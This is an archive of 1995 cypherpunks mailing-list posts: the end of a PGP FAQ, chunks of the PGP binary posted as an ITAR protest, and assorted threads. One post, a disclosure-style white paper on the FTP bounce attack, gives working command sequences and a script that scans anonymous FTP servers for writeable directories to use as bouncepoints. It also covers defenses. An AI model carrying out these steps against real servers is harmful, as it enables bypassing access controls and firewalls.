ftp://ftp.csn.net/mpj/qcrypt10.zip
ftp://ftp.informatik.uni-hamburg.de/pub/virus/crypt/file/
ftp://ftp.csn.net/mpj/I_will_not_export/crypto_???????/file/
(see ftp://ftp.csn.net/mpj/README for the ???????)
ftp://ftp.miyako.dorm.duke.edu/mpj/crypto/file/


HOW DO I SECURELY DELETE FILES (DOS)?

If you have the Norton Utilities, Norton WipeInfo is pretty
good.  I use DELETE.EXE in del110.zip, which is really good at
deleting existing files, but doesn't wipe "unused" space.

ftp://ftp.csn.net/mpj/public/del110.zip
ftp://ftp.demon.co.uk/pub/ibmpc/security/realdeal.zip


WHAT DO I DO ABOUT THE PASS PHRASE IN MY WINDOWS SWAP FILE?

The nature of Windows is that it can swap any memory to disk at
any time, meaning that all kinds of interesting things could
end up in your swap file.

ftp://ftp.firstnet.net/pub/windows/winpgp/wswipe.zip


WHAT EVER HAPPENED TO PGPfone(tm)?

It is still in the design stages, with a release target of August 1st.
Get Nautilus, instead, for now.


WHERE DO I GET NAUTILUS?

Bill Dorsey, Pat Mullarky, and Paul Rubin have come out with a
program called Nautilus that enables you to engage in secure
voice conversations between people with multimedia PCs and
modems capable of at least 9600 bps.

See

ftp://ripem.msu.edu/pub/crypt/GETTING_ACCESS
ftp://ripem.msu.edu/pub/crypt/other/naut091.zip

ftp://ftp.csn.net/mpj/README
ftp://ftp.csn.net/mpj/I_will_not_export/crypto_???????/voice/naut091.zip

ftp://ftp.netcom.com/pub/mp/mpj/README
ftp://ftp.netcom.com/pub/mp/mpj/I_will_not_export/crypto_???????/voice/naut091.zip

ftp://miyako.dorm.duke.edu/pub/GETTING_ACCESS
ftp://miyako.dorm.duke.edu/mpj/crypto/voice/naut091.zip
The Colorado Catacombs BBS 303-772-1062

ftp://ftp.ox.ac.uk/pub/crypto/misc


HOW DO I ENCRYPT MY DISK ON-THE-FLY?

Rather than manually encrypting and decrypting files, it is
sometimes easier (and therefore more secure, because you are
more likely to use it) to use a utility that encrypts or
decrypts files on the fly as you use them in your favorite
applications.  This also allows you to automatically encrypt
temporary files generated by your applications if they are on
the encrypted volume.

http://www.cs.auckland.ac.nz/~pgut01/sfs.html
ftp://ftp.informatik.uni-hamburg.de/pub/virus/crypt/disk/
ftp://ftp.csn.net/mpj/I_will_not_export/crypto_???????/disk/
(see
ftp://ftp.csn.net/mpj/README for the ???????)
ftp://miyako.dorm.duke.edu/mpj/crypto/disk/
ftp://ftp.nic.surfnet.nl/surfnet/net-security/encryption/disk/
ftp://ftp.demon.co.uk/pub/ibmpc/secdev/secdev14.arj

EMAIL/PGP LINKS

http://cag-www.lcs.mit.edu/mailcrypt/ (EMACS LISP)


WHERE IS PGP'S COMPETION?

RIPEM is the second most popular freeware email encryption
package.  I like PGP better for lots of reasons, but if for
some reason you want to check or generate a PEM signature,
RIPEM is available at ripem.msu.edu.  There is also an
exportable RIPEM/SIG.

ftp://ripem.msu.edu/pub/GETTING_ACCESS


HOW DO I PUBLISH MY PGP PUBLIC KEY?

Send mail to one of these addresses with the single word "help"
in the subject line to find out how to use them.  These servers
sychronize keys with each other.

pgp-public-keys@burn.ucsd.edu
pgp-public-keys@pgp.cc.gatech.edu
pgp-public-keys@goliat.upc.es
pgp-public-keys@demon.co.uk
pgp-public-keys@dsi.unimi.it
pgp-public-keys@ext221.sra.co.jp
pgp-public-keys@fbihh.informatik.uni-hamburg.de
pgp-public-keys@jpunix.com
pgp-public-keys@kiae.su
pgp-public-keys@kr.com
pgp-public-keys@kram.org
pgp-public-keys@kub.nl
pgp-public-keys@nexus.hpl.hp.com
pgp-public-keys@pgp.ai.mit.edu
pgp-public-keys@pgp.barclays.co.uk
pgp-public-keys@gondolin.org
pgp-public-keys@pgp.dhp.com
pgp-public-keys@pgp.hpl.hp.com
pgp-public-keys@pgp.iastate.edu
pgp-public-keys@pgp.kr.com
pgp-public-keys@pgp.mit.edu
pgp-public-keys@pgp.ox.ac.uk
pgp-public-keys@pgp.pipex.net
pgp-public-keys@srce.hr
pgp-public-keys@sw.oz.au
pgp-public-keys@uit.no
pgp-public-keys@vorpal.com
pgp-public-keys@nic.surfnet.nl

WWW interface to the key servers:
http://www-swiss.ai.mit.edu/~bal/pks-toplev.html
http://www-lsi.upc.es/~alvar/pks/pks-toplev.html

For $20/year or so, you can have your key officially certified
and published in a "clean" key database that is much less
susceptible to denial-of-service attacks than the other key
servers.  Send mail to

info-pgp@Four11.com for information, or
look at
http://www.Four11.com/

PGP public keys which are stored on SLED's Four11 Key Server are
now retrievable by fingering UserEmailAddress@publickey.com.

Example:  My e-mail addresses is mpj@csn.org

finger mpj@csn.org@publickey.com

My key (mpj8) is at Four11.com, at

ftp://ftp.csn.net/mpj/mpj8.asc,
on the key servers, on my BBS, and available by finger.


WHICH FAQ IS THE OFFICIAL ONE?

The main alt.security.pgp FAQ is published by Jeff A. Licquia,

jalicqui@prairienet.org; and is available at

ftp://ftp.prairienet.org/pub/providers/pgp/pgpfaq.txt

This shorter FAQ just covers a few of the most frequent
questions and points you to the main FAQ for more answers.
This file is

ftp://ftp.csn.net/mpj/getpgp.asc,
and is available in two parts for more limited nets as

ftp://ftp.csn.net/mpj/getpgp1.asc
and

ftp://ftp.csn.net/mpj/getpgp2.asc

There are some other periodic FAQ-related postings, too, like
the miniFAQ posted by Andre Bacard, which is more about
promoting the use of PGP than where to get it or how to use
it.

FAQs are also posted to

news.answers and

alt.answers, and
archived at rtfm.mit.edu.




CAN I COPY AND REDISTRIBUTE THIS FAQ?

Permission is granted to distribute unmodified copies of this FAQ.


                 ___________________________________________________________
                |                                                           |
|\  /| |        | Michael Paul Johnson  Colorado Catacombs BBS 303-772-1062 |
| \/ |o|        | PO Box 1151, Longmont CO 80502-1151 USA   Jesus is alive! |
|    | | /  _   | mpj@csn.org aka mpj@netcom.com m.p.johnson@ieee.org       |
|    |||/  /_\  | ftp://ftp.csn.net/mpj/README.MPJ          CIS: 71331,2332 |
|    |||\  (    | ftp://ftp.netcom.com/pub/mp/mpj/README  -. --- ----- .... |
|    ||| \ \_/  | PGPprint=F2 5E A1 C1 A6 CF EF 71  12 1F 91 92 6A ED AE A9 |
                |___________________________________________________________|





-----BEGIN PGP SIGNATURE-----
Version: 2.7.1

iQCVAwUBMANugfX0zg8FAL9FAQHn+gP/RmULFLJI0FkqmU2Tne5+Xjoy4ZAM5CAU
IPaMIbi6Hbqsx2zbVZgPnu4TetXW1hKCRLMcsUoKimJX5cc1LugNhM0IjhBwfN+D
3sfN09KBhGD6f949sg/D4c6BuSfU//d841UEDD4hSfik5D5pPqoPr5tVciYeCC+A
d3wqHiPyNzw=
=Hj3T
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: merriman@arn.net (David K. Merriman)
Date: Tue, 11 Jul 95 23:23:32 PDT
To: cypherpunks@toad.com
Subject: Re: Down with ITAR - Have YOU exported PGP today? (fwd)
Message-ID: <199507120629.BAA17204@arnet.arn.net>
MIME-Version: 1.0
Content-Type: text/plain


Only slightly bummed owner of part 015  :-/

Dave Merriman

>                                   PGP.ZIP Part [014/713]
>-
>------------------------------------------------------------------------------
>--------------------------------------------------------
>MD(<YF(IH^,(%3^L1/[['"@Q!#[3!8^*]B72\"SES5XK>?HQM7&Q(.V,-WL8P
>M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8@X'HB_9H#&\X
>MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
>-
>------------------------------------------------------------------------------


This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th
of the PGP executable. See below for getting YOUR chunk! 
------------------ PGP.ZIP Part [015/713] -------------------
M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8@X'HB_9H#&\X
MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: NMundy5276@aol.com
Date: Tue, 11 Jul 95 22:57:59 PDT
To: adam@bwh.harvard.edu
Subject: Re: Down with ITAR - Have YOU exported PGP today? (fwd)
Message-ID: <950712015748_30934874@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

      OK! I've got mine, lets rock. Here's part 14. Who's got 15!



                                   PGP.ZIP Part [014/713]
-
------------------------------------------------------------------------------
--------------------------------------------------------
MD(<YF(IH^,(%3^L1/[['"@Q!#[3!8^*]B72\"SES5XK>?HQM7&Q(.V,-WL8P
M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8@X'HB_9H#&\X
MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
-
------------------------------------------------------------------------------
--------------------------------------------------------
Get your chunk now, it's going fast!
For next chunk to export----->http://dcs.ex.ac.uk/~aba/export/
____________________________________________________________________________
____________________________________________________________________________
#!/usr/local/bin/perl -s-- -export-a-crypto-system-sig -RSA-in-3-lines-PERL  
($k,$n)=@ARGV;$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%
Sa2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print pack('H*'
,$_)while read(STDIN,$m,($w=2*$d-1+length($n||die"$0 [-d] k n\n")&~1)/2)
10 let nsa=cluless \ gosub 10 \ delete-statist-gov.nonsense-nsa-batf-ect..!
____________________________________________________________________________
____________________________________________________________________________
nmundy5276@aol.com---Nicholas Mundy +       Civilized by choice.
finger or e-mail for public key              +        Anarchist by nature.
PGP encrypted mail prefered       + Additude subject to change without
notice!
____________________________________________________________________________
____________________________________________________________________________


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMANiyhz5+ljeFhgRAQGGrAf/WK1kEY45FwtWXLbFnb2yUrkEHNDcE97N
VjAtp0WRwdG0FD1KOnKG52cvD/RXMppkfkLwf/S29ZVE+U37DYfZy2CM7UMyckuk
K0uvyaJX7EqkYsB3SbNv3ZjYd53pO7xyWOSwMLjy/HGfTDMk2A/HkSSGpJP4G7rU
m8JgT/GrbS+sETU8F4dL9GvCIbHTncKypL898kofrHnJUAYESR+IEQz3Tl8iF+Rf
87JoqBPgCrnBBXkv7hEvTQSWnGJY/6u4Ym/3/sRRgs+42eKYtDY3GztAoY7oXMpk
pEqgJCSMaTfSvln3vm8ju3jIWmFtdpHOrp3msVPT+AodIW18iZx+fQ==
=Er7K
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: *Hobbit* <hobbit@avian.org>
Date: Wed, 12 Jul 95 00:13:42 PDT
To: nobody@narq.avian.org
Subject: The FTP Bounce Attack
Message-ID: <199507120620.CAA18176@narq.avian.org>
MIME-Version: 1.0
Content-Type: text/plain


This discusses one of many possible uses of the "FTP server bounce attack".
The mechanism used is probably well-known, but to date interest in detailing
or fixing it seems low to nonexistent.  This particular example demonstrates
yet another way in which most electronically enforced "export restrictions" are
completely useless and trivial to bypass.  It is chosen in an effort to make
the reader sit up and notice that there are some really ill-conceived aspects
of the standard FTP protocol.

Thanks also to Alain Knaff at imag.fr for a brief but entertaining discussion
of some of these issues a couple of months ago which got me thinking more
deeply about them.

The motive
==========

You are a user on foreign.fr, IP address F.F.F.F, and want to retrieve
cryptographic source code from crypto.com in the US.  The FTP server at
crypto.com is set up to allow your connection, but deny access to the crypto
sources because your source IP address is that of a non-US site [as near as
their FTP server can determine from the DNS, that is].  In any case, you
cannot directly retrieve what you want from crypto.com's server.

However, crypto.com will allow ufred.edu to download crypto sources because
ufred.edu is in the US too.  You happen to know that /incoming on ufred.edu
is a world-writeable directory that any anonymous user can drop files into and
read them back from.  Crypto.com's IP address is C.C.C.C.

The attack
==========

This assumes you have an FTP server that does passive mode.  Open an FTP
connection to your own machine's real IP address [not localhost] and log in.
Change to a convenient directory that you have write access to, and then do:

	quote "pasv"
	quote "stor foobar"

Take note of the address and port that are returned from the PASV command,
F,F,F,F,X,X.  This FTP session will now hang, so background it or flip to
another window or something to proceed with the rest of this.

Construct a file containing FTP server commands.  Let's call this file
"instrs".  It will look like this:

	user ftp
	pass -anonymous@
	cwd /export-restricted-crypto
	type i
	port F,F,F,F,X,X
	retr crypto.tar.Z
	quit
	^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ... ^@^@^@^@
	^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ... ^@^@^@^@
	...

F,F,F,F,X,X is the same address and port that your own machine handed you
on the first connection.  The trash at the end is extra lines you create,
each containing 250 NULLS and nothing else, enough to fill up about 60K of
extra data.  The reason for this filler is explained later.

Open an FTP connection to ufred.edu, log in anonymously, and cd to /incoming.
Now type the following into this FTP session, which transfers a copy of your
"instrs" file over and then tells ufred.edu's FTP server to connect to
crypto.com's FTP server using your file as the commands:

	put instrs
	quote "port C,C,C,C,0,21"
	quote "retr instrs"

Crypto.tar.Z should now show up as "foobar" on your machine via your first FTP
connection.  If the connection to ufred.edu didn't die by itself due to an
apparently common server bug, clean up by deleting "instrs" and exiting.
Otherwise you'll have to reconnect to finish.

Discussion
==========

There are several variants of this.  Your PASV listener connection can be
opened on any machine that you have file write access to -- your own, another
connection to ufred.edu, or somewhere completely unrelated.  In fact, it does
not even have to be an FTP server -- any utility that will listen on a known
TCP port and read raw data from it into a file will do.  A passive-mode FTP
data connection is simply a convenient way to do this.

The extra nulls at the end of the command file are to fill up the TCP windows
on either end of the ufred -> crypto connection, and ensure that the command
connection stays open long enough for the whole session to be executed.
Otherwise, most FTP servers tend to abort all transfers and command processing
when the control connection closes prematurely.  The size of the data is enough
to fill both the receive and transmit windows, which on some OSes are quite
large [on the order of 30K].  You can trim this down if you know what OSes
are on either end and the sum of their default TCP window sizes.  It is split
into lines of 250 characters to avoid overrunning command buffers on the target
server -- probably academic since you told the server to quit already.

If crypto.com disallows *any* FTP client connection from you at foreign.fr and
you need to see what files are where, you can always put "list -aR" in your
command file and get a directory listing of the entire tree via ufred.

You may have to retrieve your command file to the target's FTP server in ASCII
mode rather than binary mode.  Some FTP servers can deal with raw newlines, but
others may need command lines terminated by CRLF pairs.  Keep this in mind when
retrieving files to daemons other than FTP servers, as well.

Other possbilities
==================

Despite the fact that such third-party connections are one-way only, they
can be used for all kinds of things.  Similar methods can be used to post
virtually untraceable mail and news, hammer on servers at various sites, fill
up disks, try to hop firewalls, and generally be annoying and hard to track
down at the same time.  A little thought will bring realization of numerous
other scary possibilities.

Connections launched this way come from source port 20, which some sites allow
through their firewalls in an effort to deal with the "ftp-data" problem.  For
some purposes, this can be the next best thing to source-routed attacks, and is
likely to succeed where source routing fails against packet filters.  And it's
all made possible by the way the FTP protocol spec was written, allowing
control connections to come from anywhere and data connections to go anywhere.

Defenses
========

There will always be sites on the net with creaky old FTP servers and
writeable directories that allow this sort of traffic, so saying "fix all
the FTP servers" is the wrong answer.  But you can protect your own against
both being a third-party bouncepoint and having another one used against you.

The first obvious thing to do is allow an FTP server to only make data
connections to the same host that the control connection originated from.
This does not prevent the above attack, of course, since the PASV listener
could just as easily be on ufred.edu and thus meet that requirement, but
it does prevent *your* site from being a potential bouncepoint.  It also
breaks the concept of "proxy FTP", but hidden somewhere in this paragraph
is a very tiny violin.

The next obvious thing is to prohibit FTP control connections that come from
reserved ports, or at least port 20.  This prevents the above scenario as
stated.

Both of these things, plus the usual poop about blocking source-routed packets
and other avenues of spoofery, are necessary to prevent hacks of this sort.
And think about whether or not you really need an open "incoming" directory.

Only allowing passive-mode client data connections is another possibility,
but there are still too many FTP clients in use that aren't passive-aware.

"A loose consensus and running code"
====================================

There is some existing work addressing this available here at avian.org [and
has been for several months, I might add] in the "fixkits archive".  Several
mods to wu-ftpd-2.4 are presented, which includes code to prevent and log
attempts to use bogus PORT commands.  Recent security fixes from elsewhere are
also included, along with s/key support and various compile-time options to
beef up security for specific applications.

Stan Barber at academ.com is working on merging these and several other fixes
into a true updated wu-ftpd release.  There are a couple of other divergent
efforts going on.  Nowhere is it claimed that any of this work is complete yet,
but it is a start toward something I have had in mind for a while -- a
network-wide release of wu-ftpd-2.5, with contributions from around the net. 
The wu-ftpd server has become very popular, but is in sad need of yet another
security upgrade.  It would be nice to pull all the improvements together into
one coordinated place, and it looks like it will happen.  All of this still
won't help people who insist on running vendor-supplied servers, of course.

Sanity-checking the client connection's source port is not implemented
specifically in the FTP server fixes, but in modifications to Wietse's
tcp-wrappers package since this problem is more general.  A simple PORT option
is added that denies connections from configurable ranges of source ports at
the tcpd stage, before a called daemon is executed.

Some of this is pointed to by /src/fixkits/README in the anonymous FTP
area here.  Read this roadmap before grabbing other things.

Notes
=====

Adding the nulls at the end of the command file was the key to making this
work against a variety of daemons.  Simply sending the desired data would
usually fail due to the immediate close signaling the daemon to bail out.

If WUSTL has not given up entirely on the whole wu-ftpd project, they are
keeping very quiet about further work.  Bryan O'Connor appears to have many
other projects to attend to by now...

This is a trivial script to find world-writeable and ftp-owned directories and
files on a unix-based anonymous FTP server.  You'd be surprised how many of
those writeable "bouncepoints" pop out after a short run of something like
this.  You will have to later check that you can both PUT and GET files from
such places; some servers protect uploaded files against reading.  Many do not,
and then wonder why they are among this week's top ten warez sites...

#!/bin/sh
ftp -n $1 << FOE
quote "user ftp"
quote "pass -nobody@"
prompt
cd /
dir "-aR" xxx.$$
bye
FOE
# Not smart enough to figure out ftp's numeric UID if no passwd file!
cat -v xxx.$$ | awk '
  BEGIN { idir = "/" ; dirp = 0 }
  /.:$/ { idir = $0 ; dirp = 1 ; }
  /^[-d][-r](......w.|........  *[0-9]* ftp  *)/ {
    if (dirp == 1) print idir
    dirp = 0
    print $0
  } '
rm xxx.$$

I suppose one could call this a white paper.  It is up for grabs at avian.org
in /random/ftp-attack as well as being posted in various relevant places.

_H*  950712




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolab@censored.org>
Date: Wed, 12 Jul 95 04:05:34 PDT
To: cypherpunks@toad.com
Subject: 17 Down, 696 to go.......
Message-ID: <Pine.BSI.3.91.950712060006.1989A-100000@usr4.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



Hey! if I can do it, any clueful c'punk can do it!

Love Always,

Carol Anne

                            PGP.ZIP PART [017/713]
                                       
   This just cycles through: when part 713 is reached, part 0 will be
   recycled. We are on export 0 at the moment.
     _________________________________________________________________
   

------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/


Member Internet Society - Certified BETSI Programmer - WWW Page Creation
-------------------------------------------------------------------------
Carol Anne Braddock         <--now running linux 1.0.9 for your pleasure
carolann@censored.org             __  __     ____  ___       ___ ____
carolab@primenet.com             /__)/__) / / / / /_  /\  / /_    /
carolb@spring.com               /   / \  / / / / /__ /  \/ /___  /
-------------------------------------------------------------------------
A great place to start
My Cyber Doc...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael J. Axelrod" <mxa2677@usl.edu>
Date: Wed, 12 Jul 95 04:49:21 PDT
To: cypherpunks@toad.com
Subject: pgp.zip
Message-ID: <199507121148.AA16273@armagnac.ucs.usl.edu>
MIME-Version: 1.0
Content-Type: text/plain


So this is what it is like living on the edge ;-{

Warning: it may be illegal to use one of these as a sig file in the US
------------------ PGP.ZIP Part [019/713] -------------------
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
M=P1!C]JXUTH0KN`[',0'>!-C$8&.:`1/Y-,6[Z,-Y?O"`PK&X=$W*`,;L1HI
MF(JAZ(A:$/`XF)C!]4W(Q>?(Q!*\C0YHC!+R+4`>EB`>_7%/4`86X19NX!HN
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 12 Jul 95 03:58:40 PDT
To: cypherpunks@toad.com
Subject: Re: Num Rat
Message-ID: <v02120d0eac295a93d5c5@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>Does anyone know more of this program? Or care to summarize
>Benford's Law?

I can't wait to learn it. ;-).

One more bit of market efficiency for the regulatory arbitrage business.

I can see it now: an application of the "BabeWatch" idea to the 1040 form....

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Wed, 12 Jul 95 19:01:26 PDT
To: cypherpunks@toad.com
Subject: AoHell
Message-ID: <v02120d0cac2993d9764c@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



Does anybody know about where to get this? (If this was discussed
here during my cypherpunks-viewing hiatus, I apologize).







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Wed, 12 Jul 95 05:09:46 PDT
To: danisch@ira.uka.de
Subject: FW: Edupage 7/9/95 (fwd)
In-Reply-To: <9507111658.AA06104@elysion.iaks.ira.uka.de>
Message-ID: <199507121204.AA27373@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


   Date: Tue, 11 Jul 1995 18:58:54 +0200
   From: danisch@ira.uka.de (Hadmut Danisch)
   X-Sun-Charset: US-ASCII
   Sender: owner-cypherpunks@toad.com
   Precedence: bulk

   > I've never seen any actual nazism on the net anywhere, but this "strict 
   > regulation" tactic is obviously fascist in nature.


   There are certain nazi pages in America. They were showing them in
   a german tv magazine some time ago, but they didn't tell the URLs.
   The URL field in the Mosaic window was painted over.

   Hadmut



How do you know they weren't local?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Wed, 12 Jul 95 04:46:48 PDT
To: alt@iquest.net (Al Thompson)
Subject: Re: RACIST MILITIA: ATF
In-Reply-To: <m0sVs4F-000BYfC@dorite1.iquest.net>
Message-ID: <9507121146.AA10352@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain




And why, pray tell, did you repost this here?

Al Thompson writes:
> 
> >> From owner-roc@xmission.com Tue Jul 11 11:10:37 1995
> >> Date: Tue, 11 Jul 1995 13:45:37 -0400 (EDT)
> >> From: Ian Goddard <igoddard@CapAccess.org>
> >> To: Libernet@Dartmouth.edu
> >> 
> >
> >Header deleted for brevity
> >
> >> (please re-post)
> >>                
> >> 		 ATF SUMMER CAMP A HOTBED OF RACIAL HATE




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Wed, 12 Jul 95 04:50:04 PDT
To: Adam Shostack <adam@bwh.harvard.edu>
Subject: Re: Don't trust the net too much
In-Reply-To: <199507120328.XAA02985@bwh.harvard.edu>
Message-ID: <9507121149.AA10360@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Adam Shostack writes:
> 	More specifically, few items sensitive electronic items are
> hardened against electromagnetic pulses.  Ever see a speaker interfere
> with your TV set?

Thats because electrons flying along long free paths in the vacuum of
your picture tube are easy to move off of path. However, I'll point
out that magnetic fields are always generated by dipoles and fall off
very fast with time. I'll also point out that you'd need a damn
powerful field to do the following:

> Build a big enough speaker, and you can screw with your computers
> memory.

I'd have to hear very, very powerful evidence that this was possible,
especially at a distance.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Date: Wed, 12 Jul 95 06:51:34 PDT
To: cypherpunks@toad.com
Subject: Re: Don't trust the net too much
In-Reply-To: <9507121149.AA10360@snark.imsi.com>
Message-ID: <doug-9506121351.AA0053320@netman.eng.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain




>
>Adam Shostack writes:
>> 	More specifically, few items sensitive electronic items are
>> hardened against electromagnetic pulses.  Ever see a speaker interfere
>> with your TV set?
>
>Thats because electrons flying along long free paths in the vacuum of
>your picture tube are easy to move off of path. However, I'll point
>out that magnetic fields are always generated by dipoles and fall off
>very fast with time. I'll also point out that you'd need a damn
>powerful field to do the following:
>
>> Build a big enough speaker, and you can screw with your computers
>> memory.
>
>I'd have to hear very, very powerful evidence that this was possible,
>especially at a distance.
>
>Perry
>
>
>

For people interested in electromagnetic fields, TEMPEST, emanations,
crashing computers, and electronics eavesdropping:

Go see Winn Schwartau talk about HERF guns sometime. He passed around
a picture of a device for < US$500 that could crash any computer within
50 yards..  Then again, it isn't too good for the person firing the gun
either.. (mega EM emissions).

The parts are available if you know what to get. a VERY enlightening
and frightening presentation. I don't think he personally has built one.
His presentation contained a presentation on TEMPEST emissions, and
low level EM field effects on sensitive equipment problems too (a PBS
documentary - a VERY compelling presentation of why you should never
use walkman/CD players/radios/electronics equipment on airplanes if
they say not to, and you value your life)

Obviously, the further you get away, the faster the field decays, so
range to target is important. Then again, the US purportedly used a kind 
of HERF bomb against Iraqi telecommunications bunkers during the Persian
Gulf war. (No I don't have any references about this, but it shouldn't
be that hard to verify).

--
____________________________________________________________________________
Doug Hughes					Engineering Network Services
System/Net Admin  				Auburn University
			doug@eng.auburn.edu
		"Real programmers use cat > file.as"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Wed, 12 Jul 95 09:03:15 PDT
To: cypherpunks@toad.com
Subject: Rosenberg/VENONA: two time pads [Re: QED_jak]
In-Reply-To: <9507121445.AA10531@snark.imsi.com>
Message-ID: <199507121601.JAA20564@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> "Perry E. Metzger" <perry@imsi.com> writes:

> The reports claimed the spys were using one time pads in some flawed
> manner, but did not explain very well what the problem was. Does
> anyone out there know?

The AP story by Rita Beamish says:

   The Venona program translated 2,200 telegrams intercepted mostly from
   1942 to 1945.  They were double encoded with a complex numerical system
   that used a different random pattern for each message, officials said.
   The code would have been impossible to crack had not the volume of
   traffic resulted in the Soviets sloppily repeating some of the
   patterns, said Kahn.

The "repeating some of the patterns" means to me "two time pad".  Lots of
work in general, but doable, unlike the one time pad.

	Jim Gillogly
	Mersday, 19 Afterlithe S.R. 1995, 16:00




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Wed, 12 Jul 95 06:32:41 PDT
To: danisch@ira.uka.de (Hadmut Danisch)
Subject: Re: FW: Edupage 7/9/95 (fwd)
In-Reply-To: <9507121233.AA15475@elysion.iaks.ira.uka.de>
Message-ID: <199507121331.JAA05803@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain



| And the nazi pages were written in english. The pages were named
| after the author of the pages (something like 'The XY report', where
| XY was the authors name, but I can't remember it. The author was
| an american).

	The Leuter report?  Leuter was a local moron who claimed to be
an engineer.  He wrote a report claiming to prove that the gas
chambers somewhere were too small to kill many people.

	The Commonwealth of Mass brought him to court several years
ago for "practicing engineering without a license."  A good rebuttal
of his report was written up by (I think) William McVey, in Canada.
Ask in talk.politics.mideast, or soc.history.revisionist or something.

	I have no idea why this thread is still on cypherpunks, unless
its an experiment in text stego.

Adam


-- 
"It is seldom that liberty          I Support The Phil
of any kind is lost all at     Zimmermann legal defense fund
once."               -Hume    http://www.netresponse.com/zldf

------------------ PGP.ZIP Part [001/713] -------------------
M4$L#!!0````(`">9ZQX3(*,_DG8!`-JF`P`'````4$=0+D581>S;=UQ3U__X
M\9M!$E8,TT@PJ$10$1=*41%WW`KX$=Q[M5KK`&R%(HH+(T.M"S>NME8K=31N
M:A$[K+5(K:O5BE405ZE:1"3?UTW`:K_]\/G\?O_^?CX>3^_-S;GGO,^\`^@W
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Allen Robinson <sebaygo@intellinet.com>
Date: Wed, 12 Jul 95 07:34:48 PDT
To: cypherpunks@toad.com
Subject: Re: pgp.zip
In-Reply-To: <199507121148.AA16273@armagnac.ucs.usl.edu>
Message-ID: <Pine.3.89.9507120958.C10643-0100000@sibyl.intellinet.com>
MIME-Version: 1.0
Content-Type: text/plain



Gee, this is not so difficult....


------------------ PGP.ZIP Part [020/713] -------------------
M=P1!C]JXUTH0KN`[',0'>!-C$8&.:`1/Y-,6[Z,-Y?O"`PK&X=$W*`,;L1HI
MF(JAZ(A:$/`XF)C!]4W(Q>?(Q!*\C0YHC!+R+4`>EB`>_7%/4`86X19NX!HN
